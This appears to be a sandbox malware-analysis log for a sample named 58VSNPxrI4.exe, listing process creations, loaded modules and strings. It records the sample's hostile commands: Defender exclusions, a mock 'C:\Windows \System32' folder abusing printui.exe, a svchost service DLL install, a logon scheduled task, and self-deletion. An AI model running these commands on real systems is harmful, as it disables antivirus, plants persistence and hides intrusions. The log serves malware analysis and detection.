Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF84D90 appears 42 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64B60 appears 330 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF9E230 appears 37 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAFA3D10 appears 31 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF946D0 appears 45 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64BB0 appears 52 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64A70 appears 478 times
Source: libwinpthread-1.dll.13.drStatic PE information: Number of sections : 12 > 10
Source: libintl-9.dll.13.drStatic PE information: Number of sections : 20 > 10
Source: libiconv-2.dll.13.drStatic PE information: Number of sections : 20 > 10
Source: x549596.dat.26.drStatic PE information: Number of sections : 11 > 10
Source: x549596.dat.26.drStatic PE information: No import functions for PE file found
Source: x549596.dat.26.drStatic PE information: Data appended to the last section found
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNamelibpq.dll6 vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinPthreadGCp( vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibsslH vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiconv.dllv+ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140d.dll^ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameintl.dllp( vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprintui.exej% vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiconv.dllv+ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140d.dll^ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameintl.dllp( vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs 58VSNPxrI4.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f
Source: classification engineClassification label: mal100.evad.winEXE@86/46@9/7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkrnqcof.t5m.ps1Jump to behavior
Source: 58VSNPxrI4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\58VSNPxrI4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 58VSNPxrI4.exeVirustotal: Detection: 45%
Source: 58VSNPxrI4.exeReversingLabs: Detection: 39%
Source: svchost.exeString found in binary or memory: -start
Source: svchost.exeString found in binary or memory: -addr
Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknownProcess created: C:\Users\user\Desktop\58VSNPxrI4.exe "C:\Users\user\Desktop\58VSNPxrI4.exe"
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x939048
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: unknownProcess created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"Jump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x939048Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe" Jump to behavior
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\58VSNPxrI4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
